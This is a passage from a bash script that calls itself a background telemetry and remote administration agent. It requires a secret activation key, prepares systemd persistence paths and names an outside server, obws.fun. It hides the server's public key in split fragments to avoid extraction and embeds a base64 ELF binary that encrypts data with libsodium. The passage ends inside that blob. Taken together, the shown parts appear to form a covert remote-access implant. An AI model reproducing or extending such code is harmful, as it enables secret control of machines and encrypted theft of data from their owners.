#!/bin/bash
# =============================================================================
# Project.....: bws - Background Telemetry & Remote Administration Agent
# Build.......: 20260619
# Signature...: SHA256
# =============================================================================

# ─── Ativacao via chave de ambiente ──────────────────────────────────────
OSBIN_HASH="c2bc31baa3e1037c3480ebcf0523a613c8d36e61d3918a7379345017c5918706"

if [ -z "$osbin" ]; then
    echo "ERRO: Variavel osbin nao definida."
    echo "  export osbin=<chave>"
    exit 1
fi

CHECK_HASH=$(echo -n "$osbin" | sha256sum | cut -d' ' -f1)
if [ "$CHECK_HASH" != "$OSBIN_HASH" ]; then
    echo "ERRO: osbin invalida."
    exit 2
fi

# ─── Caminhos ────────────────────────────────────────────────────────────
BWS_DIR="/etc/bws"
MARKER="${BWS_DIR}/.activated"
AGENT_ID_FILE="${BWS_DIR}/agent.id"
TIMER_FILE="${BWS_DIR}/last_push"
SERVICE_FILE="/etc/systemd/system/bws.service"
BWS_BIN=$(readlink -f "$0" 2>/dev/null || echo "/usr/local/bin/bws")
SERVER="https://obws.fun"

# ─── X25519 Public Key (obfuscated) ──────────────────────────────────────
# 32-byte raw X25519 server public key
# Stored as hex split across 4 parts to avoid plain extraction
_pk_a="ea0f9ee5de0f9af9"
_pk_b="e56fd67568cc28c5"
_pk_c="4e627ab07ebda382"
_pk_d="a6571792bd1e797d"

_reconstruct_pubkey() {
    local hex="${_pk_a}${_pk_b}${_pk_c}${_pk_d}"
    printf '%s' "$hex" | xxd -r -p 2>/dev/null
}

# ─── Embedded bws_crypt helper (base64) ──────────────────────────────────
BWS_CRYPT_B64="f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAIBUAAAAAAABAAAAAAAAAAEgxAAAAAAAAAAAAAEAA
OAANAEAAHQAcAAYAAAAEAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAA2AIAAAAAAADYAgAA
AAAAAAgAAAAAAAAAAwAAAAQAAAAYAwAAAAAAABgDAAAAAAAAGAMAAAAAAAAcAAAAAAAAABwA
AAAAAAAAAQAAAAAAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPgJAAAAAAAA
+AkAAAAAAAAAEAAAAAAAAAEAAAAFAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAGQYAAAAA
AAAZBgAAAAAAAAAQAAAAAAAAAQAAAAQAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAADQAQAA
AAAAANABAAAAAAAAABAAAAAAAAABAAAABgAAAEgtAAAAAAAASD0AAAAAAABIPQAAAAAAAMgC
AAAAAAAACAMAAAAAAAAAEAAAAAAAAAIAAAAGAAAAWC0AAAAAAABYPQAAAAAAAFg9AAAAAAAA
AAIAAAAAAAAAAgAAAAAAAAgAAAAAAAAABAAAAAQAAAA4AwAAAAAAADgDAAAAAAAAOAMAAAAA
AAAwAAAAAAAAADAAAAAAAAAACAAAAAAAAAAEAAAABAAAAGgDAAAAAAAAaAMAAAAAAABoAwAA
AAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFPldGQEAAAAOAMAAAAAAAA4AwAAAAAAADgD
AAAAAAAAMAAAAAAAAAAwAAAAAAAAAAgAAAAAAAAAUOV0ZAQAAAC0IAAAAAAAALQgAAAAAAAA
tCAAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAASC0AAAAAAABIPQAA
AAAAAEg9AAAAAAAAuAIAAAAAAAC4AgAAAAAAAAEAAAAAAAAAL2xpYjY0L2xkLWxpbnV4LXg4
Ni02NC5zby4yAAAAAAAEAAAAIAAAAAUAAABHTlUAAgAAwAQAAAADAAAAAAAAAAKAAMAEAAAA
AQAAAAAAAAAEAAAAFAAAAAMAAABHTlUAqRoJtXSbdVqiDOVtDCrw6L4ZwokEAAAAEAAAAAEA
AABHTlUAAAAAAAMAAAACAAAAAAAAAAAAAAADAAAAEgAAAAEAAAAGAAAAAAGhAIABEAISAAAA
FAAAAAAAAAAoHYwc0WXObWZVYRA58oscAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI4A
AAASAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAMIAAAASAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAOUAAAASAAAAAAAAAAAA
AAAAAAAAAAAAAAgBAAASAAAAAAAAAAAAAAAAAAAAAAAAAB0AAAAgAAAAAAAAAAAAAAAAAAAA
AAAAAEYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAFkAAAASAAAAAAAAAAAAAAAAAAAAAAAAALsA
AAASAAAAAAAAAAAAAAAAAAAAAAAAAH4AAAASAAAAAAAAAAAAAAAAAAAAAAAAAOwAAAASAAAA
AAAAAAAAAAAAAAAAAAAAAG8AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAASAAAAAAAAAAAA
AAAAAAAAAAAAACwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAANQAAAASAAAAAAAAAAAAAAAAAAAA
AAAAAKAAAAASAAAAAAAAAAAAAAAAAAAAAAAAANkAAAARABoAIEAAAAAAAAAIAAAAAAAAAKwA
AAAiAAAAAAAAAAAAAAAAAAAAAAAAAPQAAAARABoAMEAAAAAAAAAIAAAAAAAAAPoAAAARABoA
QEAAAAAAAAAIAAAAAAAAAABfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX19nbW9uX3N0
YXJ0X18AX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBjcnlwdG9fYm94X2tleXBhaXIAY3J5
cHRvX3NlY3JldGJveF9lYXN5AHNvZGl1bV9oZXgyYmluAHJhbmRvbWJ5dGVzX2J1ZgBjcnlw
dG9fc2NhbGFybXVsdABzb2RpdW1faW5pdABfX2N4YV9maW5hbGl6ZQBtYWxsb2MAX19saWJj
X3N0YXJ0X21haW4AZ2V0YwBzdGRvdXQAZnJlZQBzdHJsZW4AcmVhbGxvYwBzdGRpbgBzdGRl
cnIAZndyaXRlAF9fc3RhY2tfY2hrX2ZhaWwAbGlic29kaXVtLnNvLjIzAGxpYmMuc28uNgBH
TElCQ18yLjQAR0xJQkNfMi4zNABHTElCQ18yLjIuNQAAAAEAAgADAAEAAgAEAAEAAQABAAIA
AQACAAEAAgABAAIAAQACAAIAAgACAAEAAwApAQAAEAAAAAAAAAAUaWkNAAAEADMBAAAQAAAA
tJGWBgAAAwA9AQAAEAAAAHUaaQkAAAIASAEAAAAAAABIPQAAAAAAAAgAAAAAAAAAABYAAAAA
AABQPQAAAAAAAAgAAAAAAAAAwBUAAAAAAAAIQAAAAAAAAAgAAAAAAAAACEAAAAAAAADYPwAA
AAAAAAYAAAADAAAAAAAAAAAAAADgPwAAAAAAAAYAAAAEAAAAAAAAAAAAAADoPwAAAAAAAAYA
AAAHAAAAAAAAAAAAAADwPwAAAAAAAAYAAAAPAAAAAAAAAAAAAAD4PwAAAAAAAAYAAAATAAAA
AAAAAAAAAAAgQAAAAAAAAAUAAAASAAAAAAAAAAAAAAAwQAAAAAAAAAUAAAAUAAAAAAAAAAAA
AABAQAAAAAAAAAUAAAAVAAAAAAAAAAAAAABwPwAAAAAAAAcAAAABAAAAAAAAAAAAAAB4PwAA
AAAAAAcAAAACAAAAAAAAAAAAAACAPwAAAAAAAAcAAAAFAAAAAAAAAAAAAACIPwAAAAAAAAcA
AAAGAAAAAAAAAAAAAACQPwAAAAAAAAcAAAAIAAAAAAAAAAAAAACYPwAAAAAAAAcAAAAJAAAA
AAAAAAAAAACgPwAAAAAAAAcAAAAKAAAAAAAAAAAAAACoPwAAAAAAAAcAAAALAAAAAAAAAAAA
AACwPwAAAAAAAAcAAAAMAAAAAAAAAAAAAAC4PwAAAAAAAAcAAAANAAAAAAAAAAAAAADAPwAA
AAAAAAcAAAAOAAAAAAAAAAAAAADIPwAAAAAAAAcAAAAQAAAAAAAAAAAAAADQPwAAAAAAAAcA
AAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
KgAASI01gioAAEgp/kiJ8EjB7j9IwfgDSAHGSNH+dBRIiwVFKgAASIXAdAj/4GYPH0QAAMMP
H4AAAAAA8w8e+oA9fSoAAAB1K1VIgz0iKgAAAEiJ5XQMSIs9JioAAOgZ+///6GT////GBVUq
AAABXcMPHwDDDx+AAAAAAPMPHvrpd////wAAAPMPHvpIg+wISIPECMMAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAIAc29kaXVtX2luaXQg
ZmFpbGVkCgBpbnZhbGlkIHNlcnZlciBwdWJrZXkgaGV4CgBtYWxsb2MgZmFpbGVkCgByZWFs
bG9jIGZhaWxlZAoAY3J5cHRvX3NjYWxhcm11bHQgZmFpbGVkCgBjcnlwdG9fc2VjcmV0Ym94
X2Vhc3kgZmFpbGVkCgAAAAAAAAB1c2FnZTogYndzX2NyeXB0IDxzZXJ2ZXJfcHViX2hleD4K
AAABGwM7MAAAAAUAAABs7///ZAAAAEzw//+MAAAAXPD//6QAAAAs8f//vAAAAGz0//9MAAAA
FAAAAAAAAAABelIAAXgQARsMBwiQAQAAFAAAABwAAAAY9P//JgAAAABEBxAAAAAAJAAAADQA
AAAA7///4AAAAAAOEEYOGEoPC3cIgAA/GjoqMyQiAAAAABQAAABcAAAAuO///xAAAAAAAAAA
AAAAABQAAAB0AAAAsO///9AAAAAAAAAAAAAAAFgAAACMAAAAaPD//z4DAAAARg4QjwJCDhiO
A0IOII0EQg4ojAVBDjCGBkQOOIMHSQ6AAgJ8Cg44RA4wQQ4oQg4gQg4YQg4QQg4IQQtGDogC
Sg6QAlQOiAJBDoACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
